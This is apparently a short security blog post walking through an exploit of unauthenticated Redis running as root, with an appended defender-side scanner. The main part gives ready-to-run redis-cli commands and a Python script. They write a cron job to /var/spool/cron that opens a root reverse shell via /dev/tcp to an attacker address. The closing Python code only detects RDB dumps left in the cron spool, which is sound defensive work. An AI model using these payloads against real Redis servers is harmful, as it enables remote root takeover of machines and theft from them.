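Prerequisites:

1. Redis is started by the root user.

2. cron is running. /var/spool/cron holds the default scheduled tasks on a Linux machine, and Linux runs the tasks in it on schedule.

Start the service: /sbin/service crond start or /etc/init.d/crond start (CentOS family)    sudo /etc/init.d/cron start (Ubuntu family)

I. On Windows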

config set dir /var/spool/cron
config set dbfilename root
set 1 "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"
save

II. On Linux

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"|redis-cli -h 192.168.118.129 -x set 1
redis-cli -h 192.168.118.129 config set dir /var/spool/cron/
redis-cli -h 192.168.118.129 config set dbfilename root
redis-cli -h 192.168.118.129 save

III. A Python version as well

import redis


def shell_exploit():
    try:
        r = redis.StrictRedis(host='192.168.118.129', port=6379, db=0, socket_timeout=10)
        # The cron entry is stored as the value of key 1; your_ip is a placeholder.
        r.set(1, '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/your_ip/3333 0>&1\n\n')
        # Point the RDB dump at root's crontab, then write it out.
        r.config_set('dir', '/var/spool/cron')
        r.config_set('dbfilename', 'root')
        r.save()
        print("success!")
    except Exception:
        print("fail!")


shell_exploit()

The reverse shell connects back, with root privileges!
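
A defender-side check for the artifact this technique leaves behind, added here as an example and not part of the original post: after SAVE, the file in /var/spool/cron is an entire RDB snapshot, so it starts with the REDIS magic header rather than crontab text. The crontabs/ subdirectory, the function names and the sample bytes are assumptions constructed for illustration.

```python
import os
import re

# Every RDB snapshot begins with b"REDIS" followed by a 4-digit format version.
RDB_MAGIC = b"REDIS"
# A crontab entry: five schedule fields, then a command, on a line of its own.
CRON_LINE = re.compile(rb"^[ \t]*(?:[\d*/,\-]+[ \t]+){5}\S.*$", re.MULTILINE)
# /var/spool/cron is the path from the page; the crontabs/ subdirectory
# (Debian/Ubuntu layout) is an assumption added for this example.
DEFAULT_DIRS = ("/var/spool/cron", "/var/spool/cron/crontabs")

# Constructed samples: bytes shaped like an RDB dump holding one string value
# wrapped in newlines (harmless command), and an ordinary crontab.
SAMPLE_RDB = (b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\xc0\x01\x1b"
              b"\n\n*/1 * * * * /usr/bin/id\n\n\xff" + b"\x00" * 8)
SAMPLE_NORMAL = b"# m h dom mon dow command\n0 3 * * * /usr/local/bin/backup.sh\n"


def inspect_crontab(data: bytes) -> dict:
    """Report whether a crontab's bytes are really a Redis RDB snapshot."""
    is_rdb = data.startswith(RDB_MAGIC) and data[5:9].isdigit()
    entries = [m.group(0).strip().decode("latin-1") for m in CRON_LINE.finditer(data)]
    return {"rdb_header": is_rdb,
            "rdb_version": data[5:9].decode() if is_rdb else None,
            "cron_entries": entries}


def scan(dirs=DEFAULT_DIRS, max_bytes=1 << 20):
    """Return (path, report) for every spool file that starts with an RDB header."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            if not os.path.isfile(path):
                continue
            with open(path, "rb") as fh:
                report = inspect_crontab(fh.read(max_bytes))
            if report["rdb_header"]:
                findings.append((path, report))
    return findings


if __name__ == "__main__":
    for path, report in scan():
        print(f"[!] {path}: RDB v{report['rdb_version']} header in cron spool; "
              f"cron-style lines found: {report['cron_entries']}")
```

Run it as a user that can read the spool directory; any hit means a Redis instance with write access to that directory has dumped its dataset there.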
